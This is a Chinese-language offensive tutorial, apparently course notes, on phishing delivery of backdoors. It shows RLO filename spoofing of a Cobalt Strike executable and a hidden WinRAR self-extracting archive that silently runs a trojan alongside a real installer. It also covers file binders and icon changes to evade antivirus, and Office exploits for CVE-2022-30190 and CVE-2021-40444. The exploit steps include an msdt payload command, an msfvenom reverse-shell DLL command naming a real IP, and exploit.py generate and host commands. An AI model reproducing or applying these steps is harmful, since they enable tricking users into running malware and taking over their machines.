#知识点：

1、文件名-RLO 伪装-后缀

2、压缩文件-自解压-运行

3、捆绑文件-打包加载-运行

4、Office 套件-漏洞钓鱼-CVE

 

#文件后缀-钓鱼伪装-RLO

cs生成一个exe后门

重命名为一个png反过来或者jpg反过来的名字

然后再g前面输入其他字符在g字符前面右键选择这个插入RLO

然后就会惊奇的发现名字反过来了，以png后缀结尾并且程序任然还是一个exe文件可以正常的上线

 

#压缩文件-自解压-释放执行

压缩两个文件为一个文件

使用到的压缩工具为winrar

WinRAR - 压缩软件 老牌压缩软件知名产品 经典装机软件之一

准备一个正常的exe安装程序，一个木马exe

选择两个exe右键

勾选

点击

填写解压路径，这里就是解压后文件会被解压到这里。

这里就是解压后运行什么东西，我这里选择先运行木马然后运行正常的程序

这里选择隐藏，一般解压不是有个进度条还会显示解压到哪个文件夹下面，选了这个就看不到了

再勾选这两个

然后确定就会生成一个文件，不过还是一个exe文件

可以把这个exe修改为winrar的样子，这样一来无论是外观还是点击后的内容都和winrar做的事情一样了

当然也可以直接把这个exe伪装为zip文件，用前面的RLO方式

点击这个zip直接丝滑上线，并且会自动运行正常的winrar安装包

然后在路径盘可以看到解压的两个文件

不过如果我右键选择解压到还是会自动解压出原本的两个文件，所以我觉得还是不要伪装为zip直接就是伪装为安装包就可以，再zip压缩一下更像了

#捆绑文件-打包加载-释放执行

使用文件捆绑器将两个文件捆绑为一个文件，宿主文件就选正常的winrar，捆绑文件就选木马

工具链接：夸克网盘分享

这个看着和上面那个好像差不多。

修改图标使用工具进行修改，直接拖上去就可以，修改完后可能不会立马变样系统有缓存改个名字就好了

工具链接：夸克网盘分享

有些杀软会对捆绑器进行识别拦截，所以选择捆绑器也是绕过杀软的一个步骤。视频中的另一个捆绑工具：夸克网盘分享

 

#Office 套件-CVE 漏洞-MSF&CS

office套件安装工具以及激活工链接：夸克网盘分享

-Microsoft MSDT CVE-2022-30190 代码执行

GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

该漏洞首次发现在 2022 年 5 月 27 日，由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件， 通过 ms-msdt MSProtocol URI 方法来执行恶意 PowerShell 代码。感染过程利用 程序 msdt.exe，该程序用于运行各种疑难解答程序包。

此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下，恶意文档依旧可 以使用 ms-msdt URI 执行任意 PowerShell 代码。

目前已知影响的版本为：

office 2021 Lts

office 2019

office 2016

Office 2013

Office ProPlus

Office 365

项目 GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

使用代码自查是否存在漏洞，如果弹出计算器就是

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

使用工具安装了office套件2019,2021版本在虚拟机上面经过测试都没搞出存在漏洞的情况。所以无法复现了这里

原项目是会下载一个nc然后使用nc反弹，这里我们修改实现下载木马上线，所以需要修改一下内容

先cs生成一个exe的后门

在后门的目录下起个http服务，当然实战中需要在自己的vps来充当服务器

然后修改项目的follina.py的代码，在第111行处修改内容为本机的ip和8088端口，这个项目的实际作用也是在这里下载一个nc然后调用cmd去执行nc进行反弹。

MicroSoft MSHTML CVE-2021-40444 远程代码执行

影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 等各个主流版本

利用项目 GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

1、安装依赖:

apt-get install lcab（可能有的环境没有安装zip顺便把zip也安装一下后面要用到zip）

2、生成DLL:

msfvenom -p windows/meterpreter/reverse tcp lhost=47.94.236.117 lport=9999 -f dll>shell.dll 使用cs也可以

3、msf开启监听

4、生成文档

将dll放置到CVE的文件夹下面

python3 exploit.py generate shell.dll http://vpsip:10000

5、监听文档

python3 exploit.py host 10000

6、将生成当前文件夹的doc文档取出然后点击上线，msf或cs就会上线，监听10000端口会有访问的浏览数据记录

我这个也没有复现成功，步骤没有问题应该是虚拟机也不存在这个漏洞。。。这个日志中要出现一个word.cab的访问记录就对了

另外这两个CVE无法免杀，因为杀的是漏洞，还有一个CVE的漏洞太老了就没讲了。